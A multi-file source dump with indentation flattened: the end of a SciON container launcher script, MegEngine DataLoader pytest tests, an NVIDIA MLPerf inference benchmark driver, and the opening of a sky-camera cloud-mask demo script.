rabbit_util = RabbitManagementUtil(pyon_config, sysname=bootstrap.get_sys_name())
deleted_exchanges, deleted_queues = rabbit_util.clean_by_sysname()
log.info("Exchanges deleted (%s): %s" % (len(deleted_exchanges), ", ".join(deleted_exchanges)))
log.info("Queues deleted (%s): %s" % (len(deleted_queues), ", ".join(deleted_queues)))
if opts.force_clean:
from pyon.util.file_sys import FileSystem
FileSystem._clean(pyon_config)
# If auto_store_interfaces (cont'd): Store interfaces if not yet existing; set up messaging
if get_safe(bootstrap_config, "bootstrap.auto_store_interfaces") is True:
iadm.store_interfaces(idempotent=True)
iadm.declare_core_exchange_resources()
iadm.close()
if opts.no_container:
log.info("no_container=True. Stopping here.")
return None
# Create the container instance
from pyon.container.cc import Container
container = Container(*args, **command_line_config)
container.version = version
return container
def start_container(container):
"""
Start container and all internal managers. Returns when ready.
"""
container.start()
def do_work(container):
"""
Performs initial startup actions with the container as requested in arguments.
Then remains in container shell or infinite wait until container stops.
Returns when container should stop. Raises an exception if anything failed.
"""
if opts.proc:
# Run a one-off process (with the -x argument)
mod, proc = opts.proc.rsplit('.', 1)
log.info("Starting process %s", opts.proc)
container.spawn_process(proc, mod, proc, config={'process': {'type': 'immediate'}})
# And end
return
if opts.rel:
# Start a rel file
start_ok = container.start_rel_from_url(opts.rel)
if not start_ok:
raise Exception("Cannot start deploy file '%s'" % opts.rel)
if opts.mx:
from pyon.public import CFG
port = CFG.get_safe('process.admin_ui.web_server.port', 8080)
container.spawn_process("admin_ui", "ion.process.ui.admin_ui", "AdminUI")
if opts.signalparent:
log.info("Signal parent pid %d that pycc pid %d service start process is complete...", os.getppid(), os.getpid())
os.kill(os.getppid(), signal.SIGUSR1)
def is_parent_gone():
while os.getppid() != 1:
gevent.sleep(1)
log.info("Now I am an orphan ... notifying serve_forever to stop")
os.kill(os.getpid(), signal.SIGINT)
import gevent
ipg = gevent.spawn(is_parent_gone)
container.gl_parent_watch = ipg
# The following will block until TERM signal - may exit with SystemExit
if not opts.noshell and not opts.daemon:
# Keep container running while there is an interactive shell
from pyon.container.shell_api import get_shell_api
setup_ipython_shell(get_shell_api(container))
elif not opts.nomanhole:
# Keep container running while there is an embedded manhole core
from pyon.container.shell_api import get_shell_api
setup_ipython_embed(get_shell_api(container))
else:
# Keep container running until all TERM
container.serve_forever()
def install_terminate_handler():
import gevent
from pyon.core.bootstrap import CFG
shutdown_timeout = int(CFG.get_safe("container.timeout.shutdown") or 0)
terminate_gl = None
def cancel_func():
if terminate_gl:
terminate_gl.kill()
if shutdown_timeout > 0:
pid = os.getpid()
def terminate_unresponsive():
print >>sys.stderr, "ERROR: Container shutdown seems unresponsive. Timeout elapsed (%s sec) -- TERMINATE process (%s)" % (
shutdown_timeout, pid)
os.kill(pid, signal.SIGKILL)
terminate_gl = gevent.spawn_later(shutdown_timeout, terminate_unresponsive)
terminate_gl._glname = "Container terminate timeout"
log.info("Container termination timeout set to %s sec (process %s)", shutdown_timeout, pid)
return cancel_func
def stop_container(container):
try:
if container:
cancel_func = install_terminate_handler()
try:
container.stop(do_exit=False)
finally:
cancel_func()
return True
except Exception as ex:
# We want to make sure to get out here alive
log.error('CONTAINER STOP ERROR', exc_info=True)
return False
def _exists_ipython_dir():
# When multiple containers are started in parallel, all start an embedded IPython shell/manhole.
# There is a race condition between the IPython instances creating the default $HOME/.ipython dir,
# which can lead to an error.
homedir = os.path.expanduser('~')
homedir = os.path.realpath(homedir)
home_ipdir = os.path.join(homedir, ".ipython")
ipdir = os.path.normpath(os.path.expanduser(home_ipdir))
return os.path.exists(ipdir)
def setup_ipython_shell(shell_api=None):
if not _exists_ipython_dir():
log.warn("IPython profile dir not found. Attempting to avoid race condition")
import gevent
import random
gevent.sleep(random.random() * 3.0) # Introduce a random delay to make conflict less likely
ipy_config = _setup_ipython_config()
# monkeypatch the ipython inputhook to be gevent-friendly
import gevent # should be auto-monkey-patched by pyon already.
import select
def stdin_ready():
infds, outfds, erfds = select.select([sys.stdin], [], [], 0)
if infds:
return True
else:
return False
def inputhook_gevent():
try:
while not stdin_ready():
gevent.sleep(0.05)
except KeyboardInterrupt:
pass
return 0
# install the gevent inputhook
# See also https://github.com/ipython/ipython/pull/1654
from IPython.lib.inputhook import inputhook_manager
inputhook_manager.set_inputhook(inputhook_gevent)
inputhook_manager._current_gui = 'gevent'
# First import the embeddable shell class
from IPython.terminal.embed import InteractiveShellEmbed
from mock import patch
# Update namespace of interactive shell
# TODO: Cleanup namespace even further
if shell_api is not None:
locals().update(shell_api)
# Now create an instance of the embeddable shell. The first argument is a
# string with options exactly as you would type them if you were starting
# IPython at the system command line. Any parameters you want to define for
# configuration can thus be specified here.
with patch("IPython.core.interactiveshell.InteractiveShell.init_virtualenv"):
for tries in range(3):
try:
ipshell = InteractiveShellEmbed(
banner1=""" _____ _ ____ _ __ ____________
/ ___/_____(_) __ \/ | / / / ____/ ____/
\__ \/ ___/ / / / / |/ / / / / /
___/ / /__/ / /_/ / /| / / /___/ /___
/____/\___/_/\____/_/ |_/ \____/\____/""",
exit_msg='Leaving SciON CC shell, shutting down container.',
**ipy_config)
ipshell('SciON CC IPython shell. PID: %s. Type ionhelp() for help' % os.getpid())
break
except Exception as ex:
log.debug("Failed IPython initialize attempt (try #%s): %s", tries, str(ex))
import gevent
import random
gevent.sleep(random.random() * 0.5)
def setup_ipython_embed(shell_api=None):
if not _exists_ipython_dir():
log.warn("IPython profile dir not found. Attempting to avoid race condition")
import gevent
import random
gevent.sleep(random.random() * 3.0) # Introduce a random delay to make conflict less likely
# Monkey patch zmq:
# gevent-zeromq used to provide this, but its green support was merged into pyzmq without monkey patching.
# Redo the monkey patching here so that IPython's implicit use of zmq is gevent-friendly.
import zmq.green as gzmq
import zmq as ozmq
ozmq.Socket = gzmq.Socket
ozmq.Context = gzmq.Context
ozmq.Poller = gzmq.Poller
oioloop = __import__('zmq.eventloop.ioloop')
oioloop.Poller = gzmq.Poller
# Patch device:
# zmq.green.device still blocks in the C layer. We need to support the "heartbeat"
# which is a simple bounceback, so we simulate it using the following method.
orig_device = gzmq.device
def device_patch(dev_type, insock, outsock, *args):
if dev_type == ozmq.FORWARDER:
while True:
m = insock.recv()
outsock.send(m)
else:
orig_device(dev_type, insock, outsock, *args)
ozmq.device = device_patch
gzmq.device = device_patch
from IPython.kernel.zmq import kernelapp
kernelapp._ctrl_c_message = "Ctrl-C is disabled. To end the process, use Ctrl-\\ or kill"
from IPython import embed_kernel
ipy_config = _setup_ipython_config()
# set specific manhole options
import tempfile
from mock import patch
temp_dir = tempfile.mkdtemp()
ipy_config["config"].Application.ipython_dir = temp_dir
with patch("IPython.core.interactiveshell.InteractiveShell.init_virtualenv"):
for tries in range(3):
try:
embed_kernel(local_ns=shell_api, **ipy_config) # blocks until INT signal
break
except Exception as ex:
log.debug("Failed IPython initialize attempt (try #%s): %s", tries, str(ex))
import gevent
import random
gevent.sleep(random.random() * 0.5)
except:
try:
if os.path.exists(ipy_config["connection_file"]):
os.remove(ipy_config["connection_file"])
except Exception:
pass
raise
# @TODO: race condition here versus ipython, this will leave junk in tmp dir
#import shutil
#try:
# shutil.rmtree(temp_dir)
#except shutil.Error:
# pass
def _setup_ipython_config():
from IPython.config.loader import Config
ipy_config = Config()
conn_file = os.path.join(os.path.abspath(os.curdir), "manhole-%s.json" % os.getpid())
ipy_config.KernelApp.connection_file = conn_file
ipy_config.PromptManager.in_template = '><> '
ipy_config.PromptManager.in2_template = '... '
ipy_config.PromptManager.out_template = '--> '
ipy_config.InteractiveShellEmbed.confirm_exit = False
#ipy_config.Application.log_level = 10 # uncomment for debug level ipython logging
res_args = dict(config=ipy_config, connection_file=conn_file)
return res_args
# main() -----> ENTER
# ----------------------------------------------------------------------------------
# Container life cycle
prepare_logging()
container = None
try:
container = prepare_container()
if container is None:
sys.exit(0)
start_container(container)
# Let child processes run if we are the parent
if child_procs and childproc_go:
childproc_go.set()
except Exception as ex:
log.error('CONTAINER START ERROR', exc_info=True)
stop_childprocs()
stop_container(container)
sys.exit(1)
try:
do_work(container)
except Exception as ex:
stop_childprocs()
stop_container(container)
log.error('CONTAINER PROCESS INTERRUPTION', exc_info=True)
sys.exit(1)
except (KeyboardInterrupt, SystemExit):
log.info("Received a kill signal, shutting down the container (%s)", os.getpid())
# Assumption: stop is so robust, it does not fail even if it was only partially started
stop_childprocs()
stop_ok = stop_container(container)
if not stop_ok:
sys.exit(1)
# START HERE:
# PYCC STEP 1
if __name__ == '__main__':
entry()
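# The --logcfg/--config handling above accepts either a Python dict literal or a path to a
# YAML file. A minimal, self-contained sketch of that dispatch (illustrative only, not part
# of pycc; the helper name is made up):
def _example_parse_override(value):
    """Classify an override value as a literal dict or a config path."""
    import ast
    if '{' in value:
        try:
            return ('literal', ast.literal_eval(value))
        except (ValueError, SyntaxError):
            raise Exception("Value error in override arg '%s'" % value)
    return ('path', value)

# _example_parse_override("{'system': {'name': 'dev'}}") -> ('literal', {'system': {'name': 'dev'}})
# _example_parse_override("res/config/logging.local.yml") -> ('path', 'res/config/logging.local.yml')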
|
test_dataloader.py
|
# -*- coding: utf-8 -*-
# MegEngine is Licensed under the Apache License, Version 2.0 (the "License")
#
# Copyright (c) 2014-2021 Megvii Inc. All rights reserved.
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT ARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
import os
import platform
import time
import numpy as np
import pytest
from megengine.data.collator import Collator
from megengine.data.dataloader import DataLoader
from megengine.data.dataset import ArrayDataset, StreamDataset
from megengine.data.sampler import RandomSampler, SequentialSampler, StreamSampler
from megengine.data.transform import (
Compose,
Normalize,
PseudoTransform,
ToMode,
Transform,
)
def init_dataset():
sample_num = 100
rand_data = np.random.randint(0, 255, size=(sample_num, 1, 32, 32), dtype=np.uint8)
label = np.random.randint(0, 10, size=(sample_num,), dtype=int)
dataset = ArrayDataset(rand_data, label)
return dataset
def test_dataloader_init():
dataset = init_dataset()
with pytest.raises(ValueError):
dataloader = DataLoader(dataset, num_workers=2, divide=True)
with pytest.raises(ValueError):
dataloader = DataLoader(dataset, num_workers=-1)
with pytest.raises(ValueError):
dataloader = DataLoader(dataset, timeout=-1)
with pytest.raises(ValueError):
dataloader = DataLoader(dataset, num_workers=0, divide=True)
dataloader = DataLoader(dataset)
assert isinstance(dataloader.sampler, SequentialSampler)
assert isinstance(dataloader.transform, PseudoTransform)
assert isinstance(dataloader.collator, Collator)
dataloader = DataLoader(
dataset, sampler=RandomSampler(dataset, batch_size=6, drop_last=False)
)
assert len(dataloader) == 17
dataloader = DataLoader(
dataset, sampler=RandomSampler(dataset, batch_size=6, drop_last=True)
)
assert len(dataloader) == 16
class MyStream(StreamDataset):
def __init__(self, number, batch=False, error_format=False, block=False):
self.number = number
self.batch = batch
self.error_format = error_format
self.block = block
def __iter__(self):
for cnt in range(self.number):
if self.block:
for _ in range(10):
time.sleep(1)
if self.batch:
data = np.random.randint(0, 256, (2, 2, 2, 3), dtype="uint8")
yield (True, (data, [cnt, cnt - self.number]))
else:
data = np.random.randint(0, 256, (2, 2, 3), dtype="uint8")
if self.error_format:
yield (data, cnt)
else:
yield (False, (data, cnt))
return  # PEP 479: raising StopIteration inside a generator would surface as RuntimeError
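# MyStream exercises the StreamDataset item contract checked by DataLoader: every yielded
# element is a tuple (is_batch_data, (data, label)); with is_batch_data=True the payload
# already carries the batch dimension. A standalone sketch of the two shapes (illustrative
# only, not used by the tests below):
def _example_stream_items():
    sample = (False, (np.zeros((2, 2, 3), dtype="uint8"), 0))            # one sample plus its label
    batch = (True, (np.zeros((2, 2, 2, 3), dtype="uint8"), [0, -100]))   # pre-batched data plus labels
    return sample, batch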
@pytest.mark.parametrize("batch", [True, False])
@pytest.mark.parametrize("num_workers", [0, 2])
def test_stream_dataloader(batch, num_workers):
dataset = MyStream(100, batch=batch)
sampler = StreamSampler(batch_size=4)
dataloader = DataLoader(
dataset,
sampler,
Compose([Normalize(mean=(103, 116, 123), std=(57, 57, 58)), ToMode("CHW")]),
num_workers=num_workers,
)
check_set = set()
for step, data in enumerate(dataloader):
if step == 10:
break
assert data[0].shape == (4, 3, 2, 2)
assert data[1].shape == (4,)
for i in data[1]:
assert i not in check_set
check_set.add(i)
def test_stream_dataloader_error():
dataset = MyStream(100, error_format=True)
sampler = StreamSampler(batch_size=4)
dataloader = DataLoader(dataset, sampler)
with pytest.raises(AssertionError, match=r".*tuple.*"):
data_iter = iter(dataloader)
next(data_iter)
@pytest.mark.parametrize("num_workers", [0, 2])
def test_stream_dataloader_timeout(num_workers):
dataset = MyStream(100, False, block=True)
sampler = StreamSampler(batch_size=4)
dataloader = DataLoader(dataset, sampler, num_workers=num_workers, timeout=2)
with pytest.raises(RuntimeError, match=r".*timeout.*"):
data_iter = iter(dataloader)
next(data_iter)
def test_dataloader_serial():
dataset = init_dataset()
dataloader = DataLoader(
dataset, sampler=RandomSampler(dataset, batch_size=4, drop_last=False)
)
for (data, label) in dataloader:
assert data.shape == (4, 1, 32, 32)
assert label.shape == (4,)
def test_dataloader_parallel():
# set max shared memory to 100M
os.environ["MGE_PLASMA_MEMORY"] = "100000000"
dataset = init_dataset()
dataloader = DataLoader(
dataset,
sampler=RandomSampler(dataset, batch_size=4, drop_last=False),
num_workers=2,
divide=False,
)
for (data, label) in dataloader:
assert data.shape == (4, 1, 32, 32)
assert label.shape == (4,)
dataloader = DataLoader(
dataset,
sampler=RandomSampler(dataset, batch_size=4, drop_last=False),
num_workers=2,
divide=True,
)
for (data, label) in dataloader:
assert data.shape == (4, 1, 32, 32)
assert label.shape == (4,)
@pytest.mark.skipif(
platform.system() == "Windows",
reason="dataloader do not support parallel on windows",
)
def test_dataloader_parallel_timeout():
dataset = init_dataset()
class TimeoutTransform(Transform):
def __init__(self):
pass
def apply(self, input):
time.sleep(10)
return input
dataloader = DataLoader(
dataset,
sampler=RandomSampler(dataset, batch_size=4, drop_last=False),
transform=TimeoutTransform(),
num_workers=2,
timeout=2,
)
with pytest.raises(RuntimeError, match=r".*timeout.*"):
data_iter = iter(dataloader)
batch_data = next(data_iter)
@pytest.mark.skipif(
platform.system() == "Windows",
reason="dataloader do not support parallel on windows",
)
def test_dataloader_parallel_worker_exception():
dataset = init_dataset()
class FakeErrorTransform(Transform):
def __init__(self):
pass
def apply(self, input):
y = x + 1  # deliberate NameError (x is undefined) so the worker process dies
return input
dataloader = DataLoader(
dataset,
sampler=RandomSampler(dataset, batch_size=4, drop_last=False),
transform=FakeErrorTransform(),
num_workers=2,
)
with pytest.raises(RuntimeError, match=r"worker.*died"):
data_iter = iter(dataloader)
batch_data = next(data_iter)
def _multi_instances_parallel_dataloader_worker():
dataset = init_dataset()
for divide_flag in [True, False]:
train_dataloader = DataLoader(
dataset,
sampler=RandomSampler(dataset, batch_size=4, drop_last=False),
num_workers=2,
divide=divide_flag,
)
val_dataloader = DataLoader(
dataset,
sampler=RandomSampler(dataset, batch_size=10, drop_last=False),
num_workers=2,
divide=divide_flag,
)
for idx, (data, label) in enumerate(train_dataloader):
assert data.shape == (4, 1, 32, 32)
assert label.shape == (4,)
if idx % 5 == 0:
for val_data, val_label in val_dataloader:
assert val_data.shape == (10, 1, 32, 32)
assert val_label.shape == (10,)
def test_dataloader_parallel_multi_instances():
# set max shared memory to 100M
os.environ["MGE_PLASMA_MEMORY"] = "100000000"
_multi_instances_parallel_dataloader_worker()
def test_dataloader_parallel_multi_instances_multiprocessing():
# set max shared memory to 100M
os.environ["MGE_PLASMA_MEMORY"] = "100000000"
import multiprocessing as mp
# mp.set_start_method("spawn")
processes = []
for i in range(4):
p = mp.Process(target=_multi_instances_parallel_dataloader_worker)
p.start()
processes.append(p)
for p in processes:
p.join()
@pytest.mark.parametrize("num_workers", [0, 2])
def test_timeout_event(num_workers):
def cb():
return (True, (np.zeros(shape=(2, 2, 2, 3)), np.ones(shape=(2,))))
dataset = MyStream(100, block=True)
sampler = StreamSampler(batch_size=4)
dataloader = DataLoader(
dataset, sampler, num_workers=num_workers, timeout=2, timeout_event=cb
)
for _, data in enumerate(dataloader):
np.testing.assert_equal(data[0], np.zeros(shape=(4, 2, 2, 3)))
np.testing.assert_equal(data[1], np.ones(shape=(4,)))
break
|
main.py
|
# Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import re
import os, sys
sys.path.insert(0, os.getcwd())
from code.common.scopedMPS import ScopedMPS, turn_off_mps
from code.common import logging
from code.common import args_to_string, find_config_files, load_configs, run_command
import code.common.arguments as common_args
from importlib import import_module
import multiprocessing as mp
from multiprocessing import Process
def get_benchmark(benchmark_name, conf):
# Do not use a map. We want to import benchmarks as we need them, because some take
# time to load due to plugins.
if benchmark_name == "resnet":
ResNet50 = import_module("code.resnet.tensorrt.ResNet50").ResNet50
return ResNet50(conf)
elif benchmark_name == "mobilenet":
MobileNet = import_module("code.mobilenet.tensorrt.MobileNet").MobileNet
return MobileNet(conf)
elif benchmark_name == "ssd-small":
SSDMobileNet = import_module("code.ssd-small.tensorrt.SSDMobileNet").SSDMobileNet
return SSDMobileNet(conf)
elif benchmark_name == "ssd-large":
SSDResNet34 = import_module("code.ssd-large.tensorrt.SSDResNet34").SSDResNet34
return SSDResNet34(conf)
elif benchmark_name == "gnmt":
GNMTBuilder = import_module("code.gnmt.tensorrt.GNMT").GNMTBuilder
return GNMTBuilder(conf)
else:
raise ValueError("Unknown benchmark: {:}".format(benchmark_name))
def apply_overrides(config, keys):
# Make a copy so we don't modify original dict
config = dict(config)
override_args = common_args.parse_args(keys)
for key in override_args:
# Unset values (None) and unset store_true values (False) are both false-y
if override_args[key]:
config[key] = override_args[key]
return config
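# apply_overrides() only copies truthy parsed values over the base config: None and unset
# store_true flags (False) leave the base setting untouched. The merge rule in isolation,
# with a plain dict standing in for the common_args.parse_args() result (illustrative only):
def _example_merge_overrides(base, overrides):
    merged = dict(base)
    for key, value in overrides.items():
        if value:  # false-y override values are skipped
            merged[key] = value
    return merged

# _example_merge_overrides({"gpu_batch_size": 64}, {"gpu_batch_size": None, "verbose": True})
# -> {"gpu_batch_size": 64, "verbose": True}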
def launch_handle_generate_engine(benchmark_name, config, gpu, dla):
retries = 3
timeout = 7200
success = False
for i in range(retries):
# Build engines in another process to make sure we exit with clean cuda context so that MPS can be turned off.
from code.main import handle_generate_engine
p = Process(target=handle_generate_engine, args=(benchmark_name, config, gpu, dla))
p.start()
try:
p.join(timeout)
except KeyboardInterrupt:
p.terminate()
p.join(timeout)
raise KeyboardInterrupt
if p.exitcode == 0:
success = True
break
if not success:
raise RuntimeError("Building engines failed!")
def handle_generate_engine(benchmark_name, config, gpu=True, dla=True):
logging.info("Building engines for {:} benchmark in {:} scenario...".format(benchmark_name, config["scenario"]))
if benchmark_name == "gnmt":
arglist = common_args.GNMT_ENGINE_ARGS
else:
arglist = common_args.GENERATE_ENGINE_ARGS
config = apply_overrides(config, arglist)
if dla and "dla_batch_size" in config:
config["batch_size"] = config["dla_batch_size"]
logging.info("Building DLA engine for {:}_{:}_{:}".format(config["system_id"], benchmark_name, config["scenario"]))
b = get_benchmark(benchmark_name, config)
b.build_engines()
if gpu and "gpu_batch_size" in config:
config["batch_size"] = config["gpu_batch_size"]
config["dla_core"] = None
logging.info("Building GPU engine for {:}_{:}_{:}".format(config["system_id"], benchmark_name, config["scenario"]))
b = get_benchmark(benchmark_name, config)
b.build_engines()
if gpu and config["scenario"] == "Server" and benchmark_name == "gnmt":
b = get_benchmark(benchmark_name, config)
b.build_engines()
logging.info("Finished building engines for {:} benchmark in {:} scenario.".format(benchmark_name, config["scenario"]))
def handle_run_harness(benchmark_name, config, gpu=True, dla=True):
logging.info("Running harness for {:} benchmark in {:} scenario...".format(benchmark_name, config["scenario"]))
if config["scenario"] == "SingleStream":
arglist = common_args.SINGLE_STREAM_HARNESS_ARGS
elif config["scenario"] == "Offline":
arglist = common_args.OFFLINE_HARNESS_ARGS
elif config["scenario"] == "MultiStream":
arglist = common_args.MULTI_STREAM_HARNESS_ARGS
elif config["scenario"] == "Server":
arglist = common_args.SERVER_HARNESS_ARGS
if benchmark_name == "gnmt":
arglist = common_args.GNMT_HARNESS_ARGS
config = apply_overrides(config, arglist)
# Validate arguments
if not dla:
config["dla_batch_size"] = None
if not gpu:
config["gpu_batch_size"] = None
if benchmark_name == "gnmt":
from code.common.harness import GNMTHarness
harness = GNMTHarness(config, name=benchmark_name)
else:
from code.common.harness import BenchmarkHarness
harness = BenchmarkHarness(config, name=benchmark_name)
result = harness.run_harness()
logging.info("Result: {:}".format(result))
# Append result to perf result summary log.
log_dir = config["log_dir"]
summary_file = os.path.join(log_dir, "perf_harness_summary.json")
results = {}
if os.path.exists(summary_file):
with open(summary_file) as f:
results = json.load(f)
config_name = "{:}-{:}".format(config["system_id"], config["scenario"])
if config_name not in results:
results[config_name] = {}
results[config_name][benchmark_name] = result
with open(summary_file, "w") as f:
json.dump(results, f)
# Check accuracy from loadgen logs.
accuracy = check_accuracy(os.path.join(log_dir, config["system_id"], benchmark_name, config["scenario"], "mlperf_log_accuracy.json"),
benchmark_name, config)
summary_file = os.path.join(log_dir, "accuracy_summary.json")
results = {}
if os.path.exists(summary_file):
with open(summary_file) as f:
results = json.load(f)
config_name = "{:}-{:}".format(config["system_id"], config["scenario"])
if config_name not in results:
results[config_name] = {}
results[config_name][benchmark_name] = accuracy
with open(summary_file, "w") as f:
json.dump(results, f)
def check_accuracy(log_file, benchmark_name, config):
accuracy_targets = {
"resnet": 76.46,
"mobilenet": 71.68,
"ssd-large": 20.0,
"ssd-small": 22.0,
"gnmt": 23.9
}
threshold_ratios = {
"resnet": 0.99,
"mobilenet": 0.98,
"ssd-large": 0.99,
"ssd-small": 0.99,
"gnmt": 0.99
}
if not os.path.exists(log_file):
return "Cannot find accuracy JSON file."
with open(log_file, "r") as f:
loadgen_dump = json.load(f)
if len(loadgen_dump) == 0:
return "No accuracy results in PerformanceOnly mode."
threshold = accuracy_targets[benchmark_name] * threshold_ratios[benchmark_name]
if benchmark_name in ["resnet", "mobilenet"]:
cmd = "python3 build/inference/v0.5/classification_and_detection/tools/accuracy-imagenet.py --mlperf-accuracy-file {:} \
--imagenet-val-file data_maps/imagenet/val_map.txt --dtype int32 ".format(log_file)
regex = r"accuracy=([0-9\.]+)%, good=[0-9]+, total=[0-9]+"
elif benchmark_name == "ssd-small":
cmd = "python3 build/inference/v0.5/classification_and_detection/tools/accuracy-coco.py --mlperf-accuracy-file {:} \
--coco-dir {:} --output-file build/ssd-small-results.json".format(
log_file, os.path.join(os.environ.get("PREPROCESSED_DATA_DIR", "build/preprocessed_data"), "coco"))
regex = r"mAP=([0-9\.]+)%"
elif benchmark_name == "ssd-large":
cmd = "python3 build/inference/v0.5/classification_and_detection/tools/accuracy-coco.py --mlperf-accuracy-file {:} \
--coco-dir {:} --output-file build/ssd-large-results.json --use-inv-map".format(
log_file, os.path.join(os.environ.get("PREPROCESSED_DATA_DIR", "build/preprocessed_data"), "coco"))
regex = r"mAP=([0-9\.]+)%"
elif benchmark_name == "gnmt":
cmd = "python3 build/inference/v0.5/translation/gnmt/tensorflow/process_accuracy.py --accuracy_log {:} \
--reference build/preprocessed_data/nmt/GNMT/newstest2014.tok.bpe.32000.de".format(log_file)
regex = r"BLEU: ([0-9\.]+)"
else:
raise ValueError("Unknown benchmark: {:}".format(benchmark_name))
output = run_command(cmd, get_output=True)
result_regex = re.compile(regex)
accuracy = None
with open(os.path.join(os.path.dirname(log_file), "accuracy.txt"), "w") as f:
for line in output:
print(line, file=f)
for line in output:
result_match = result_regex.match(line)
if result_match is not None:
accuracy = float(result_match.group(1))
break
accuracy_result = "PASSED" if accuracy is not None and accuracy >= threshold else "FAILED"
if accuracy_result == "FAILED":
raise RuntimeError("Accuracy = {:.3f}, Threshold = {:.3f}. Accuracy test {:}!".format(accuracy, threshold, accuracy_result))
return "Accuracy = {:.3f}, Threshold = {:.3f}. Accuracy test {:}.".format(accuracy, threshold, accuracy_result)
def handle_calibrate(benchmark_name, config):
logging.info("Generating calibration cache for Benchmark \"{:}\"".format(benchmark_name))
config = apply_overrides(config, common_args.CALIBRATION_ARGS)
config["dla_core"] = None
b = get_benchmark(benchmark_name, config)
b.calibrate()
def main():
# Turn off MPS in case it's turned on.
turn_off_mps()
main_args = common_args.parse_args(common_args.MAIN_ARGS)
benchmarks = ["mobilenet", "resnet", "ssd-small", "ssd-large", "gnmt"]
benchmarks_legacy_map = {
"ResNet50": "resnet",
"MobileNet": "mobilenet",
"SSDMobileNet": "ssd-small",
"SSDResNet34": "ssd-large",
"GNMT": "gnmt"
}
if main_args["benchmarks"] is not None:
benchmarks = main_args["benchmarks"].split(",")
for i, benchmark in enumerate(benchmarks):
if benchmark in benchmarks_legacy_map:
benchmarks[i] = benchmarks_legacy_map[benchmark]
scenarios = ["SingleStream", "MultiStream", "Offline", "Server"]
scenarios_legacy_map = {
"single_stream": "SingleStream",
"multi_stream": "MultiStream",
"offline": "Offline",
"server": "Server"
}
if main_args["scenarios"] is not None:
scenarios = main_args["scenarios"].split(",")
for i, scenario in enumerate(scenarios):
if scenario in scenarios_legacy_map:
scenarios[i] = scenarios_legacy_map[scenario]
# Automatically detect architecture and scenarios and load configs
config_files = main_args["configs"]
if config_files == "":
config_files = find_config_files(benchmarks, scenarios)
if config_files == "":
logging.warn("Cannot find any valid configs for the specified benchmarks scenarios.")
return
logging.info("Using config files: {:}".format(str(config_files)))
configs = load_configs(config_files)
for config in configs:
logging.info("Processing config \"{:}\"".format(config["config_name"]))
benchmark_name = config["benchmark"]
benchmark_conf = config[benchmark_name]
# Passthrough for top level values
benchmark_conf["system_id"] = config["system_id"]
benchmark_conf["scenario"] = config["scenario"]
benchmark_conf["benchmark"] = config["benchmark"]
benchmark_conf["config_name"] = config["config_name"]
need_gpu = not main_args["no_gpu"]
need_dla = not main_args["gpu_only"]
if main_args["action"] == "generate_engines":
# Turn on MPS if server scenario and if active_sms is specified.
benchmark_conf = apply_overrides(benchmark_conf, ["active_sms"])
active_sms = benchmark_conf.get("active_sms", None)
if config["scenario"] == "Server" and active_sms is not None and active_sms < 100:
with ScopedMPS(active_sms):
launch_handle_generate_engine(benchmark_name, benchmark_conf, need_gpu, need_dla)
else:
launch_handle_generate_engine(benchmark_name, benchmark_conf, need_gpu, need_dla)
elif main_args["action"] == "run_harness":
handle_run_harness(benchmark_name, benchmark_conf, need_gpu, need_dla)
elif main_args["action"] == "calibrate":
# To generate calibration cache, we only need to run each benchmark once. Use offline config.
if benchmark_conf["scenario"] == "Offline":
handle_calibrate(benchmark_name, benchmark_conf)
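# main() accepts both legacy and current benchmark/scenario names and remaps them before locating
# config files. The remap step in isolation (illustrative only):
def _example_remap_names(names, legacy_map):
    return [legacy_map.get(name, name) for name in names]

# _example_remap_names(["ResNet50", "ssd-small"], {"ResNet50": "resnet"}) -> ["resnet", "ssd-small"]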
if __name__ == "__main__":
mp.set_start_method("spawn")
main()
|
cloud_mask_demo.py
|
import numpy as np
import os, glob
from matplotlib import pyplot as plt
import camera as cam
import time, sys
import stat_tools as st
from scipy.ndimage import morphology, filters, measurements ####more efficient than skimage
from scipy import signal
from skimage.morphology import remove_small_objects
# from skimage import measure
from collections import deque
import pickle,multiprocessing
import subprocess
# import cv2,of_dis
MAX_INTERVAL = 180 ####max allowed interval between two frames for cloud motion estimation
SAVE_FIG=False
cameraIDs=['HD5A', 'HD5B', 'HD4A','HD4B', 'HD3A', 'HD3B','HD2B', 'HD2C', 'HD1B', 'HD1C'];
ixy={'HD5A':[0,0],'HD5B':[1,0],'HD4A':[2,0],'HD4B':[3,0],'HD3A':[4,0],'HD3B':[0,2], \
'HD2B':[1,2],'HD2C':[2,2],'HD1B':[3,2],'HD1C':[4,2]}
# cameraIDs=['HD2C', 'HD2B', 'HD3B'];
# cameraIDs=['HD2B'];
if len(sys.argv)>=2:
days=[sys.argv[1]]
else:
days=['2018082312[0,2,4]','20180825161','20180829165','2018082112[0,1]','20180830181','20180824171','20180821132']
# days=['20180825161']; ####multilayer cloud
# days=['20180829165'] #####scattered cloud
# days=['20180821121'] #####thin, overcast cloud
# days=['20180821120'] #####overcast cloud
# days=['20180830181'] #####blue sky
# days=['20180824171'] ###gray sky
# days=['20180821132'] ##### partial cloud
days=['20180829162'];
# days=['20180825161','20180823124','20180829165','20180821132','20180830181','20180824171'];
days=['20181001141'] #####scattered cloud
days=['20180911151'] #####scattered cloud
inpath='~/data/images/'
outpath='~/ldata/results/cm/'
# tmpfs='/dev/shm/'
tmpfs='~/ldata/tmp/'
def visualize(camIDs, dates):
for day in dates:
flist = sorted(glob.glob(inpath+camIDs[0]+'/'+day[:8]+'/'+camIDs[0]+'_'+day+'*.jpg'))
if len(flist)<=1:
continue
for f in flist[1:]:
ymdhms=f[-18:-4]
print(ymdhms)
counter=0;
for counter in range(10):
try:
pkls=sorted(glob.glob(tmpfs+day[:8]+'/HD*_'+ymdhms+'.pkl'));
except:
time.sleep(5);
continue
if len(pkls)>=max(1,len(camIDs)-2):
break;
time.sleep(5);
fig,ax=plt.subplots(4,5,figsize=(12,10),sharex=True,sharey=True);
for pkl in pkls:
camID=pkl[-23:-19]
if camID not in camIDs:
continue;
ix, iy=ixy[camID]
ax[iy,ix].set_title(camID);
